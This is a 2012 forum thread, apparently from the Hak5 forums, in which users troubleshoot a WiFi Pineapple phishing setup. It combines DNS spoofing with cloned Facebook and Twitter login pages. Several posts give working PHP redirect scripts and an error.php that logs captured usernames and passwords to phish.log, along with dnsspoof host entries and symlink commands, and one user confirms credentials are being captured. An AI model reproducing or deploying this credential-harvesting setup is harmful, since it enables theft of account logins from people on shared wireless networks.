dns spoof - pages refresh constantly and wont load

[SystemCrash86]

I seem to have a problem with dns spoof and phishing on the wifi pineapple mark 4

In spoof hosts i add:

172.16.42.1 *

and i even tried 172.16.42.1 *.facebook.com with no difference.

and the index.php page is:

<html>

<head>

<meta http-equiv="REFRESH" content=0;url=redirect.php">

</head>

<body>

</body>

</html>

I followed loozr tutorial about phishing but whenever i try to go to facebook.com or any website the page just refreshes constantly with actually loading the page.

and when i just type 172.16.42.1 into my browser on my other computer, with or with out dns spoof running it still refreshes the page rapidly without loading it with "http://172.16.42.1/redirect.php%22" in the url bar.

winscp into the pineapple and in the www folder the redirect.php page is as so:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "facebook")){

header('Location: facebook.html');

}

require('error.php');

?>

If you need anymore information let me know. I am completely stumped by this. Hope someone can help

[newbi3]

Have you ever done a DNS spoof before? I think it would really benefit you if you put the pineapple aside for right now and get a copy of ettercap. It's free and very easy to use, also you will get a huge benefit from learning how DNS works and setting up an apache server (if you choose to host it locally which I recommend). I'm not trying to insult you I just think that if you do something you should understand the inner workings of it. I guarantee you that once you do this you will see your problem and be able to fix it right away.

[coolgeek]

I'm with newbi3 on this.

Use the laptop you loaded with Backtrack 5 to do the tinkering and learning how things work.

Remember, pen-testing is 90% research.

[SystemCrash86]

yes i have used dns spoof before so i am familiar with how to use it and how it works and i have used ettercap all the time on my backtrack 5 r2 machine.

but i am having issues with this on the pineapple and as i mentioned before. Have i got the redirect.php and index.php correct? I thought i had because of the tutorials i have seen but apparently not so i must be missing something. I would love other opinions. All help is greatly appreciated.

Newbi3, dont worry you didnt insult me i am greatful for your help and opinions

[coolgeek]

I guess you'll have to ask yourself where that traffic is redirected to, and what the purposes of index.php and redirect.php are.

[--nick--]

i just read that an update to dnspoof was released yesterday. try to update the module.

which version of mark4 firmware do you have? First update to the newest firmware, then update dnsspoof?

-maybe edit redirect .php

-maybe edit index.php change where it says redirect.php to another file thats in the same folder with redirect.php.

Edited December 17, 2012 by --nick--

[SystemCrash86]

i just read that an update to dnspoof was released yesterday. try to update the module.

which version of mark4 firmware do you have? First update to the newest firmware, then update dnsspoof?

-maybe edit redirect .php

-maybe edit index.php change where it says redirect.php to another file thats in the same folder with redirect.php.

I have the 2.7.0 firmware, i already updated the dns spoof module. I also did like you said and changed where it says redirect.php to facebook.html which is one of the folders i have symlinked there from the usb that is in the pineapple.

The only thing that changed was in the url bar instead of saying http://172.16.42.1/redirect.php%22 it now says http://172.16.42.1/facebook.html%22 and the page refreshes very fast without loading the page

[SystemCrash86]

I just tried the random roll and it worked. its just the phishing side that i cant get to work.

I enabled random roll and spoofing host 172.16.42.1 * then on my other pc i typed in the ip of the pineapple and it worked, the page loaded to one of the random roll's modules and pressing f5 to refresh the page enable a new one to take over.

So i know that dns spoof works. But i still cant figure out the phishing part

[--nick--]

I think I saw the fisching in the forum. you need to edit the .html you use variable value=email or something and I think you also have to edit the redirect.php.

Edited December 17, 2012 by --nick--

[SystemCrash86]

I think I saw the fisching in the forum. you need to edit the .html you use variable value=email or something and I think you also have to edit the redirect.php.

What do i edit redirect.php with? I have seen some tutorials and bits here and there but i dont know. Where abouts did you see this in the phishing forum? perhaps its something i havent tried yet

[--nick--]

yea its in there but i cant remember where exactly. i made a reply on one of the pfhisching threads and i put a link to the thread that helped me. find my reply and follow that , i hope that helps you. i think i will take a look in the forum for it too since i have my pineapple plugged in now and seems to be working right.

edited:

i think this was what i was talking about http://forums.hak5.o...e__hl__phishing

actually maybe not what i was looking for, but that might help a bit.

Edited December 17, 2012 by --nick--

[SystemCrash86]

yea its in there but i cant remember where exactly. i made a reply on one of the pfhisching threads and i put a link to the thread that helped me. find my reply and follow that , i hope that helps you. i think i will take a look in the forum for it too since i have my pineapple plugged in now and seems to be working right.

edited:

i think this was what i was talking about http://forums.hak5.o...e__hl__phishing

actually maybe not what i was looking for, but that might help a bit.

Thats one of the tutorials i followed, everything goes ok until i open up a browser and try to go to the spoofed page or even 172.16.42.1 - the pages just keep refreshing on a loop with out loading and pages

[--nick--]

yep i had that problem too. maybe change the line redirect.php to error.php ?

or look at this stuff and play around with the .php files

http://forums.hak5.o...ing#entry210253

or maybe what you are talking about is the other problem i was having.

i was able to see the passwords logging to the phish.txt but after that i could'nt just surf the net like normal because all the traffic is still being redirected to my pfhisch page.

when you look at the dns spoof config

172.16.42.1 * the star means all websites.

Still if i had only redirected like say if i was doing google to my phishing page, then after the log is phicshed i would still be stuck on that same page ,google.

i wanted to know how i can direct myself away from google after the logs are phished into the phish.txt. and i still dont know how. ulitmately i would like to redirect away from any page i am already phisching.

Edited December 17, 2012 by --nick--

[RebelCork]

I seem to have a problem with dns spoof and phishing on the wifi pineapple mark 4

In spoof hosts i add:

172.16.42.1 *

and i even tried 172.16.42.1 *.facebook.com with no difference.

and the index.php page is:

<html>

<head>

<meta http-equiv="REFRESH" content=0;url=redirect.php">

</head>

<body>

</body>

</html>

I followed loozr tutorial about phishing but whenever i try to go to facebook.com or any website the page just refreshes constantly with actually loading the page.

and when i just type 172.16.42.1 into my browser on my other computer, with or with out dns spoof running it still refreshes the page rapidly without loading it with "http://172.16.42.1/r.../redirect.php"" in the url bar.

winscp into the pineapple and in the www folder the redirect.php page is as so:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "facebook")){

header('Location: facebook.html');

}

require('error.php');

?>

If you need anymore information let me know. I am completely stumped by this. Hope someone can help

What is happening is quite simple:

If you want ALL of the captured traffic to go through dnsspoof, you use 172.16.42.1 *

(remember * is the wildcard)

172.16.42.1 *.facebook.com as above wont work as you are saying redirect the following:

whatever.facebook.com

to the pineapple.

for facebook, you should use 172.16.42.1 www.facebook.com

in your redirect.php:

it is looking for facebook.html - I presume you have a phish page called facebook.html in the same folder as redirect??

[coolgeek]

SystemCrash86,

Which page is showing as the Landing Page in the pineapples Configuration screen? That is what traffic is first redirected to.

[SystemCrash86]

What is happening is quite simple:

If you want ALL of the captured traffic to go through dnsspoof, you use 172.16.42.1 *

(remember * is the wildcard)

172.16.42.1 *.facebook.com as above wont work as you are saying redirect the following:

whatever.facebook.com

to the pineapple.

for facebook, you should use 172.16.42.1 www.facebook.com

in your redirect.php:

it is looking for facebook.html - I presume you have a phish page called facebook.html in the same folder as redirect??

I tried dns spoof both ways just to make sure and i get the same result. Yes i do have a facebook,html page and a redirect.php page in the /www/ folder of the pineapple

[SystemCrash86]

SystemCrash86,

Which page is showing as the Landing Page in the pineapples Configuration screen? That is what traffic is first redirected to.

The Landing page in my pineapple is:

<html>

<head>

<meta http-equiv="REFRESH" content=0;url=redirect.php">

</head>

<body>

</body>

</html>

This is from the tutorial i used

But when ever i try to go to the page , in this case facebook.html which is also in the same folder as my redirect.php in the folder /www of my pineapple the page just is in a constant refresh loop and wont load any page

[--nick--]

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, “facebook”)){ header('Location: index.html'); }

require('redirect.php');

?>

this is the index.php that was working for me with mark3

does this do anything for you?

Edited December 18, 2012 by --nick--

[--nick--]

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
	$nam = stripslashes($_POST['name']);
	$pas = stripslashes($_POST['pass']);
	$nam = htmlspecialchars($nam, ENT_QUOTES);
	$pas = htmlspecialchars($pas, ENT_QUOTES);

	$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

	$filed = @fopen("pineapple/phish.log", "a+");
	@fwrite($filed, "$content\n");
	@fclose($filed);
}
?>





<html><head>




<script language="javascript">
location.replace("http://69.171.229.16");
</script>




</head>


<body>

</body></html>

this is error.php

Edited December 19, 2012 by --nick--

[loozr]

Hi there!

When you guys are posting code, please use the code brackets

[code]and the actual code

[/code]

Systemcrash:

The code used in the tutor you followed is kind of old, better to use the original files that follows the pineapple flash. When your facebookclone is crafted you have to copy it over to the pineapple. If you place it directly in the /www/folder on your pineapple move on, if you placed it on your /usb/ then you have to symlink your files to the /www/ folder. In my case I use the command

ln -s /usb/phish/* /www/

but you have to enter what is true in your case.

Now, when you enter

ls -la /www/

you should see your facebook files. Since they are symlinks they may look a bit different than i.e. index.php, but the important thing is that they shows up.

Now go ahead and edit redirect.php. I myself like to use nano, just because that's the editor I'm familiar with, and it is installed in the pineapple;)

Sadly I don't have an example of that file on this computer, but originally I think it contains an example.com example. Just edit example and example.com to facebook and facebook.com. I guess you'll understand what I mean when you open the file. Remember to writeout your changes.

For the DnsSpoof part you will have to test out a little bit, but the basic understanding is that

* = anything
*.facebook.com = .anything.facebook.com

Personally I'm using (haha weird colors)
*facebook.com

And power up DnsSpoof.

You have to remember that most computer do cache the DNS requests, meaning that if you have visited the real facebook site you may end up in the real facebook site afterall. If this is the case then in windows you will have to enter the following in commandline

ipconfig /flushdns

And make another try.

Lastly I have to say that filenames and foldernames may be different in your case, so you'll have to substitute your own.

[--nick--]

Hi there!

When you guys are posting code, please use the code brackets

[code]and the actual code

[/code]

Systemcrash:

The code used in the tutor you followed is kind of old, better to use the original files that follows the pineapple flash. When your facebookclone is crafted you have to copy it over to the pineapple. If you place it directly in the /www/folder on your pineapple move on, if you placed it on your /usb/ then you have to symlink your files to the /www/ folder. In my case I use the command

ln -s /usb/phish/* /www/

but you have to enter what is true in your case.

Now, when you enter

ls -la /www/

you should see your facebook files. Since they are symlinks they may look a bit different than i.e. index.php, but the important thing is that they shows up.

Now go ahead and edit redirect.php. I myself like to use nano, just because that's the editor I'm familiar with, and it is installed in the pineapple;)

Sadly I don't have an example of that file on this computer, but originally I think it contains an example.com example. Just edit example and example.com to facebook and facebook.com. I guess you'll understand what I mean when you open the file. Remember to writeout your changes.

For the DnsSpoof part you will have to test out a little bit, but the basic understanding is that

* = anything
*.facebook.com = .anything.facebook.com

Personally I'm using (haha weird colors)
*facebook.com

And power up DnsSpoof.

You have to remember that most computer do cache the DNS requests, meaning that if you have visited the real facebook site you may end up in the real facebook site afterall. If this is the case then in windows you will have to enter the following in commandline

ipconfig /flushdns

And make another try.

Lastly I have to say that filenames and foldernames may be different in your case, so you'll have to substitute your own.

<?php
$ref = $_SERVER['HTTP_REFERER'];
if (strpos($ref, "example"))	{ header('Location: example.html'); }
if (strpos($ref, "twitter"))	{ header('Location: twitter.html'); }
require('example.html');
?>

can i see your redirect.php please ?

and for Systemcrash86 try editing the part of the facebook.html action=" <---------- put in action="error.php"

and edit the redirect.php change the part that says error.php to facebook.html

Edited December 20, 2012 by --nick--

[loozr]

This is my redirect.php

<?php
$ref = "http.//".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "hotmail")){header('Location: hotmail.htm');}
if (strpos($ref, "facebook")){header('Location: facebook.htm');}

require('error.php');
?>

[SystemCrash86]

Making progress.

I made a file on my usb called phish (just to make things easier) and copied my face book and twitter templetes into it then editing facebook.html

action=" <---------- put in action="error.php".

Then I create symlinks by issuing the command

ln -s /usb/phish/* /www/

from the pineapple interface and verifying they are there by issuing the command

ls -la /www/

My edited redirect.php is:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

if (strpos($ref, "facebook")){

header('Location: facebook.html');

}

require('facebook.html');

?>

　

My index.php remains untouched:

<html>

<head>

<meta http-equiv="REFRESH" content="0;url=redirect.php">

</head>

<body>

</body>

</html>

And my error.php also remains untouched:

<?php

$ref = $_SERVER['HTTP_REFERER'];

$today = date("F j, Y, g:i a");

if (isset($_POST['name']) && !empty($_POST['name'])) {

$nam = stripslashes($_POST['name']);

$pas = stripslashes($_POST['pass']);

$nam = htmlspecialchars($nam, ENT_QUOTES);

$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("/pineapple/logs/phish.log", "a+");

@fwrite($filed, "$content\n");

@fclose($filed);

}

?>

<html><head>

<script type="text/javascript">

function goBack()

{

window.history.back()

}

</script>

</head>

<body onload="goBack()">

</body></html>

　

I had to type the IP of the pineapple in my url bar because dnsspoof wouldn’t work at the moment and the template of facebook appears - this is progress as before nothing loading and kept refreshing.

But the url does not read

http://www.facebook.com/facebook.html like I’m told should happen, instead it says 172.16.42.1/redirect.php if I just type in the IP of the pineapple.

I enter in my credentials and they show up in the pineapple/logs/phish.log

So I’m making progress here.

[--nick--]

I am stuck at that part too. I would like to know how to spoof the url. I think that might only work for specific browsers version or something though.

did this help you ? its still not working for me. http://forums.hak5.o...edirectphp-fix/

maybe putting your html inside of the index.php ? please let me know if you figure it out.

edit: i think i know what the problem is.

-enable dnspoof just use the * for now to test.

-connect to the pineapple using a SECOND pc and by wireless <-------------------

-type in any url in the address bar at the top, in your internet browser.

and it is working only using the index.php and the error.php.

Edited December 24, 2012 by --nick--